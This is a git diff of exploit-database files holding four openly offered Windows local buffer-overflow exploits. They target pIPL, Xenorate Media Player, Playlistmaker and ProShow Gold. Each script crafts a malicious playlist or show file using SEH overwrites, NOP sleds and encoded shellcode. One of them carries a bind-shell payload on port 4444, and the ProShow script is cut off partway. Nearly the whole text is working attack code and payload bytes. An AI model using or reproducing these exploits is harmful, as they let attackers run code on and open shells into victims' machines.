-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". 
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> HACK4LOVE.PLS'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-08-13] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# pIPL V 2.5.0 (.PLS /.PL) Universal Local Buffer Exploit (SEH) +# http://www.programmedintegration.com/files/pipl.exe +# ## easy #### this work sooooooooo good############################ +#################################################################### +# USE>>LOAD PLAYLIST>>HACK4LOVE.PLS>>DOUBLE CLICK TO PLAY >BOOM CALC +#################################################################### +my $bof="\x41" x 4108; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\x17\x07\x01\x10";#xaudio.dll####P/P/R +my $nop="\x90" x 20; +#################################################################### +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". 
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> HACK4LOVE.PLS'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-08-13] diff --git a/platforms/windows/local/9458.pl b/platforms/windows/local/9458.pl index bcd94806e..972fde6c3 100755 --- a/platforms/windows/local/9458.pl +++ b/platforms/windows/local/9458.pl 
@@ -1,44 +1,44 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Xenorate Media Player 2.6.0.0(.xpl)Universal Local Buffer Exploit (SEH)
-# http://www.softpedia.com/progDownload/Xenorate-Download-71701.html
-####################################################################
-## USE>>LOAD PLAYLIST>>HACK4LOVE.XPL>>>BOOM CALC
-####################################################################
-# ## easy #### this work sooooooooo good############################
-####################################################################
-my $bof="\x41" x 88;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\x4B\x3F\x01\x11";##bass.dll
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> HACK4LOVE.XPL'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-08-18] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# Xenorate Media Player 2.6.0.0(.xpl)Universal Local Buffer Exploit (SEH) +# http://www.softpedia.com/progDownload/Xenorate-Download-71701.html +#################################################################### +## USE>>LOAD PLAYLIST>>HACK4LOVE.XPL>>>BOOM CALC +#################################################################### +# ## easy #### this work sooooooooo good############################ +#################################################################### +my $bof="\x41" x 88; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\x4B\x3F\x01\x11";##bass.dll +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". 
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> HACK4LOVE.XPL'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-08-18] diff --git a/platforms/windows/local/9466.pl b/platforms/windows/local/9466.pl index df387c53e..f15cff4ee 100755 --- a/platforms/windows/local/9466.pl +++ b/platforms/windows/local/9466.pl 
@@ -1,89 +1,89 @@
-# Playlistmaker version 1.51
-# Tested on Windows XP SP2 (English)
-# Exploit originally discovered by ThE g0bL!N/exploited by germaya_x
-
-# I could not get germaya_x's exploit to work with XP3.
-# The only useable p/p/r I could find was in oledlg.dll
-# which seems to be compiled with SafeSEH on in XP SP3.
-# However, oledlg.dll is useable in XP SP2.
-
-
-print "\n========================"
-print "Playlistmaker v1.5 (SEH)"
-print "Exploit written by Blake"
-print "Discovered by ThE g0bL!N"
-print "========================\n"
-
-# windows/shell_bind_tcp - 696 bytes
-# http://www.metasploit.com
-# Encoder: x86/alpha_mixed
-# EXITFUNC=seh, LPORT=4444, RHOST=
-
-shellcode = (
-"\x89\xe2\xdb\xce\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b"
-"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b"
-"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a"
-"\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31"
-"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x46"
-"\x51\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
-"\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
-"\x4b\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f"
-"\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
-"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
-"\x4c\x49\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x46\x51\x49"
-"\x4b\x43\x54\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x47\x30\x44\x4c"
-"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x45\x58\x51"
-"\x4e\x42\x48\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
-"\x49\x46\x42\x46\x50\x53\x42\x46\x45\x38\x50\x33\x50\x32\x42"
-"\x48\x42\x57\x43\x43\x46\x52\x51\x4f\x50\x54\x4b\x4f\x4e\x30"
-"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x4e" -"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x44\x48" -"\x45\x52\x51\x45\x42\x4a\x44\x42\x4b\x4f\x4e\x30\x45\x38\x48" -"\x59\x45\x59\x4c\x35\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43" -"\x50\x53\x46\x33\x46\x33\x51\x43\x50\x43\x51\x43\x51\x53\x46" -"\x33\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x42\x46" -"\x50\x53\x4b\x39\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x44" -"\x30\x49\x57\x46\x37\x4b\x4f\x49\x46\x42\x4a\x44\x50\x46\x31" -"\x46\x35\x4b\x4f\x48\x50\x45\x38\x4e\x44\x4e\x4d\x46\x4e\x4b" -"\x59\x46\x37\x4b\x4f\x4e\x36\x50\x53\x51\x45\x4b\x4f\x4e\x30" -"\x45\x38\x4d\x35\x47\x39\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e" -"\x36\x50\x50\x51\x44\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33" -"\x42\x48\x4b\x57\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x49" -"\x46\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x42\x44\x45\x36" -"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x42\x4a\x50\x50\x51" -"\x49\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x50\x44\x4d\x59" -"\x4d\x32\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46" -"\x4d\x4b\x4e\x47\x32\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x47\x48" -"\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b\x4e\x48\x33\x45" -"\x46\x4b\x4f\x43\x45\x50\x44\x4b\x4f\x4e\x36\x51\x4b\x50\x57" -"\x50\x52\x50\x51\x50\x51\x46\x31\x42\x4a\x45\x51\x50\x51\x46" -"\x31\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x49\x49" -"\x45\x55\x48\x4e\x51\x43\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b" -"\x4f\x50\x37\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43" -"\x48\x44\x43\x54\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x43" -"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x49\x46" -"\x4b\x4f\x4e\x30\x41\x41") - - -#[ Buffer ][ Short Jump ][ P/P/R ][ NOP Sled ][ Shellcode ] -payload = "\x41" * 992 # buffer -payload += "\xEB\x09\x90\x90" # short jump -payload += "\x67\x15\xd3\x74" # overwrites SEH Handler => P/P/R (oledlg.dll) 0x74d31567 -payload += "\x90" * 20 # NOP Sled -payload += shellcode # shellcode - 
-print "[+] Creating exploit file" - -try: - file = open("exploit.m3u","w") - file.write(payload) - file.close() - print "[+] Exploit file created" -except: - print "[x] Error creating file!" - -# milw0rm.com [2009-08-18] +# Playlistmaker version 1.51 +# Tested on Windows XP SP2 (English) +# Exploit originally discovered by ThE g0bL!N/exploited by germaya_x + +# I could not get germaya_x's exploit to work with XP3. +# The only useable p/p/r I could find was in oledlg.dll +# which seems to be compiled with SafeSEH on in XP SP3. +# However, oledlg.dll is useable in XP SP2. + + +print "\n========================" +print "Playlistmaker v1.5 (SEH)" +print "Exploit written by Blake" +print "Discovered by ThE g0bL!N" +print "========================\n" + +# windows/shell_bind_tcp - 696 bytes +# http://www.metasploit.com +# Encoder: x86/alpha_mixed +# EXITFUNC=seh, LPORT=4444, RHOST= + +shellcode = ( +"\x89\xe2\xdb\xce\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b" +"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b" +"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a" +"\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31" +"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x46" +"\x51\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37" +"\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" +"\x4b\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f" +"\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c" +"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b" +"\x4c\x49\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x46\x51\x49" +"\x4b\x43\x54\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x47\x30\x44\x4c" +"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x45\x58\x51" 
+"\x4e\x42\x48\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f" +"\x49\x46\x42\x46\x50\x53\x42\x46\x45\x38\x50\x33\x50\x32\x42" +"\x48\x42\x57\x43\x43\x46\x52\x51\x4f\x50\x54\x4b\x4f\x4e\x30" +"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x4e" +"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x44\x48" +"\x45\x52\x51\x45\x42\x4a\x44\x42\x4b\x4f\x4e\x30\x45\x38\x48" +"\x59\x45\x59\x4c\x35\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43" +"\x50\x53\x46\x33\x46\x33\x51\x43\x50\x43\x51\x43\x51\x53\x46" +"\x33\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x42\x46" +"\x50\x53\x4b\x39\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x44" +"\x30\x49\x57\x46\x37\x4b\x4f\x49\x46\x42\x4a\x44\x50\x46\x31" +"\x46\x35\x4b\x4f\x48\x50\x45\x38\x4e\x44\x4e\x4d\x46\x4e\x4b" +"\x59\x46\x37\x4b\x4f\x4e\x36\x50\x53\x51\x45\x4b\x4f\x4e\x30" +"\x45\x38\x4d\x35\x47\x39\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e" +"\x36\x50\x50\x51\x44\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33" +"\x42\x48\x4b\x57\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x49" +"\x46\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x42\x44\x45\x36" +"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x42\x4a\x50\x50\x51" +"\x49\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x50\x44\x4d\x59" +"\x4d\x32\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46" +"\x4d\x4b\x4e\x47\x32\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x47\x48" +"\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b\x4e\x48\x33\x45" +"\x46\x4b\x4f\x43\x45\x50\x44\x4b\x4f\x4e\x36\x51\x4b\x50\x57" +"\x50\x52\x50\x51\x50\x51\x46\x31\x42\x4a\x45\x51\x50\x51\x46" +"\x31\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x49\x49" +"\x45\x55\x48\x4e\x51\x43\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b" +"\x4f\x50\x37\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43" +"\x48\x44\x43\x54\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x43" +"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x49\x46" +"\x4b\x4f\x4e\x30\x41\x41") + + +#[ Buffer ][ Short Jump ][ P/P/R ][ NOP Sled ][ Shellcode ] +payload = "\x41" * 992 # buffer +payload += 
"\xEB\x09\x90\x90" # short jump +payload += "\x67\x15\xd3\x74" # overwrites SEH Handler => P/P/R (oledlg.dll) 0x74d31567 +payload += "\x90" * 20 # NOP Sled +payload += shellcode # shellcode + +print "[+] Creating exploit file" + +try: + file = open("exploit.m3u","w") + file.write(payload) + file.close() + print "[+] Exploit file created" +except: + print "[x] Error creating file!" + +# milw0rm.com [2009-08-18] diff --git a/platforms/windows/local/9483.pl b/platforms/windows/local/9483.pl index ca1d4d5c8..6dd04e3b9 100755 --- a/platforms/windows/local/9483.pl +++ b/platforms/windows/local/9483.pl 
@@ -1,254 +1,254 @@
-#
-# [+] Vulnerability : ProShow Gold 4 BOF
-# [+] Detected by : Bkis - http://blog.bkis.com/?p=737
-# [*] Sploit coded by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
-# [*] Sploit coded on : August 20, 2009
-# [*] Type : local
-# [*] OS : Windows
-# [*] Product : Photodex ProShow Gold
-# [*] Versions affected : 4.0
-# [*] Download link : http://www.photodex.com/downloads/go_proshowgold
-# [*] -------------------------------------------------------------------------
-# [*] Method : SEH - Universal
-# [*] Tested on : Windows XP SP3 En
-# [*] Greetz&Tx to : Saumil/SK
-# [*] -------------------------------------------------------------------------
-# MMMMM~.
-# MMMMM?.
-# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
-# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
-# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
-# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
-# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
-# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
-# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
-# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
-# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
-# eip hunters
-# -----------------------------------------------------------------------------
-# Script provided 'as is', without any warranty.
-# Use for educational purposes only.
-#
-print " [+] Preparing payload\n";
-my $sploitfile="proshowsploit.psh";
-my $fileheader="Photodex(R) ProShow(TM) Show File Version=0\n".
-"proshowVersion=2549\n".
-"title=Untitled ProShow 1\n".
-"fileName=proshowsploit.psh\n".
-"description=''\n".
-"showAspect=1\n".
-"showSizeX=16\n".
-"showSizeY=9\n".
-"loop=1\n".
-"loopRestart=1\n".
-"displaySizeX=704\n".
-"displaySizeY=528\n".
-"videoSizeX=720\n".
-"videoSizeY=480\n".
-"videoFrameRate=29970\n".
-"videoBitRate=1120000\n".
-"videoMuxBitRate=1394400\n".
-"outputImageSizeX=1024\n".
-"outputImageSizeY=768\n".
-"outputQuality=80\n".
-"toolbarEnable=1\n".
-"allowQuit=1\n".
-"allowPlay=1\n".
-"allowTime=1\n".
-"allowRestart=1\n".
-"allowSave=1\n".
-"allowSaveAll=1\n".
-"allowPrint=1\n".
-"allowPrintAll=1\n".
-"allowCopy=1\n".
-"allowSaver=1\n".
-"allowCta=1\n".
-"ctaLabel=ProShow Info\n".
-"ctaURL=http://www.photodex.com/\n".
-"background=1\n".
-"bgOutlineColor=0\n".
-"bgSizeMode=1\n".
-"bgColorizeColor=8421504\n".
-"waterOpacity=128\n".
-"waterZoom=10000\n".
-"waterColorizeColor=8421504\n".
-"musicVolumeOffset=100\n".
-"defaultCellVolumeOffset=100\n".
-"defaultCellFadeIn=100\n".
-"defaultCellFadeOut=100\n".
-"defaultMusicVolumeOffset=50\n".
-"defaultMusicFadeIn=100\n".
-"defaultMusicFadeOut=100\n".
-"maxDispWidth=800\n".
-"maxDispHeight=600\n".
-"maxRender=1\n".
-"maxRenderWidth=800\n".
-"maxRenderHeight=600\n".
-"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n".
-"makeFileLocalFolder=c:/\n".
-"cells=2\n".
-"cell[0].imageEnable=1\n".
-"cell[0].nrOfImages=1\n".
-"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
-my $junk = "A" x 6120;
-my $nseh = "\xeb\x18\x90\x90";
-my $seh = pack('V',0x01a614ea);
-my $nop="\x90" x 30;
-# windows/exec - 144 bytes
-# http://www.metasploit.com
-# Encoder: x86/shikata_ga_nai
-# EXITFUNC=seh, CMD=calc
-my $shellcode="\xda\xd1\xd9\x74\x24\xf4\x2b\xc9\xb1\x1e\xbd\x78\x41\xbf" .
-"\x6f\x58\x83\xe8\xfc\x31\x68\x14\x03\x68\x6c\xa3\x4a\x93" .
-"\x64\x67\xb5\x6c\x74\xe3\xf0\x50\xff\x8f\xff\xd0\xfe\x80" .
-"\x8b\x6e\x18\xd4\xd3\x50\x19\x01\xa2\x1b\x2d\x5e\x34\xf2" .
-"\x7c\xa0\xae\xa6\xfa\xe0\xa5\xb1\xc3\x2b\x48\xbf\x01\x40" .
-"\xa7\x84\xd1\xb3\x4c\x8e\x3c\x30\x13\x54\xbf\xac\xca\x1f" .
-"\xb3\x79\x98\x7f\xd7\x7c\x75\xf4\xfb\xf5\x88\xe0\x8a\x56" .
-"\xaf\xf2\x4f\x39\x9e\x0c\x2f\x90\x84\x7b\xe9\x2c\xce\x3c" .
-"\xf9\xc7\xa0\xa0\xac\x53\x28\xd1\x27\x9b\x2a\x21\x5d\x0c" .
-"\x45\x52\x2b\xa8\xca\xfa\xb3\x4f\x7e\xf4\x94\x50\x98\x6a" .
-"\x7b\xc3\x04\x6d";
-
-my $junk2="D" x (2000-length($shellcode));
-my $filefooter = "\ncell[0].images[0].imageEnable=1\n".
-"cell[0].images[0].name=Abstract_02\n".
-"cell[0].images[0].replaceableTemplate=1\n".
-"cell[0].images[0].sizeMode=1\n".
-"cell[0].images[0].colorizeColor=8421504\n".
